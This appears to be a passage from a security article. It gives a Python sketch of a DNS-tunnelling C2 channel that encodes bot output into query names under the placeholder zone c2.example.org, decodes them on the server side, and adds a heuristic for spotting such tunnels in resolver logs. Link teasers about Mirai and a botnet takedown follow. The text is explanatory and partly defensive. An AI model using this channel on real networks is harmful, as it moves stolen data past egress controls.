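As an added illustration of the encoding problem such a channel has to solve (this is not Galvatron's code, and it is written in Python rather than PowerShell; the zone name c2.example.org, the bot identifier, the query-name layout and the detection thresholds are all assumptions): the bot base32-encodes its output and splits it into query names that respect the 63-byte label and 253-byte name limits, the authoritative server for the zone reassembles the payload from the queries it receives, and a length/entropy heuristic shows what the same traffic looks like from the resolver-log side.

```python
"""Added example: carrying bot output upstream inside DNS query names, the
server-side reassembly, and a cheap heuristic a defender can key on."""
import base64
import math
from collections import Counter

C2_DOMAIN = "c2.example.org"      # assumed attacker-controlled zone
MAX_LABEL, MAX_NAME = 63, 253     # DNS limits on a label and on a full name


def _b32(data):
    # base32 survives the case folding resolvers may apply; base64 would not
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text):
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_upstream(bot_id, payload):
    """Split the payload into query names <data labels>.<seq>.<bot>.<C2_DOMAIN>,
    each label at most 63 bytes and each full name at most 253 bytes."""
    text = _b32(payload)
    names, seq, pos = [], 0, 0
    while pos < len(text):
        suffix = f"{seq}.{bot_id}.{C2_DOMAIN}"
        room = MAX_NAME - len(suffix) - 1         # bytes left for data labels and their dots
        labels = []
        while pos < len(text) and room > 1:
            take = min(MAX_LABEL, room - 1, len(text) - pos)
            labels.append(text[pos:pos + take])
            pos += take
            room -= take + 1
        names.append(".".join(labels + [suffix]))
        seq += 1
    return names


def decode_upstream(names):
    """Authoritative-server side: group queries by bot, order by seq, rebuild payloads."""
    chunks = {}
    for name in names:
        if not name.endswith("." + C2_DOMAIN):
            continue
        *data, seq, bot = name[: -len(C2_DOMAIN) - 1].split(".")
        chunks.setdefault(bot, {})[int(seq)] = "".join(data)
    return {bot: _unb32("".join(parts[i] for i in sorted(parts))) for bot, parts in chunks.items()}


def _entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def looks_like_tunnel(name, max_len=100, max_label=40, min_entropy=3.5):
    """Heuristic only (thresholds are assumptions): long names, long labels or
    high-entropy subdomain text are what DNS tunnels leave in resolver logs."""
    labels = name.rstrip(".").split(".")
    sub = "".join(labels[:-2])                    # everything left of the registered domain
    return len(name) > max_len or max(map(len, labels)) > max_label or _entropy(sub) > min_entropy


if __name__ == "__main__":
    output = b"uid=0(root) gid=0(root) groups=0(root)\n" * 5   # constructed bot output
    queries = encode_upstream("bot7", output)
    for q in queries:
        print(len(q), q[:60] + "...", looks_like_tunnel(q))
    assert decode_upstream(queries)["bot7"] == output
```

The encoder never builds a name longer than 253 bytes, so every query is one a recursive resolver will forward without complaint, which is exactly why the channel works through an egress filter that allows only DNS. For the defender the same property is the tell: a 200-byte query name made of base32 labels is nothing a browser produces, and the heuristic above, applied to resolver query logs, catches both names the constructed payload generates while leaving www.example.com alone. Real tunnels add per-query sequence checks, retransmission and downstream data in TXT or NULL answers, none of which this sketch covers.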
|Stronger IoT Passwords to Prevent Mirai Botnet Attacks||The Dyn DNS attack that happened last year is the largest distributed denial of service (DDoS) attack on record, simply because of the enormity of the connected devices involved and the number of businesses that were impacted by it. The Mirai malware, responsible for this attack, compromised hundreds of thousands of connected devices with default […]|
|FBI, EuroPol And NCA Hijack Botnet And What You Should Do||I love it when life is made hard for cyber criminals, but the truth is it doesn't happen very often. You would think writing malicious code is hard, but it often isn't. You would think that users follow simple security best practice and that attackers have to come up [...]|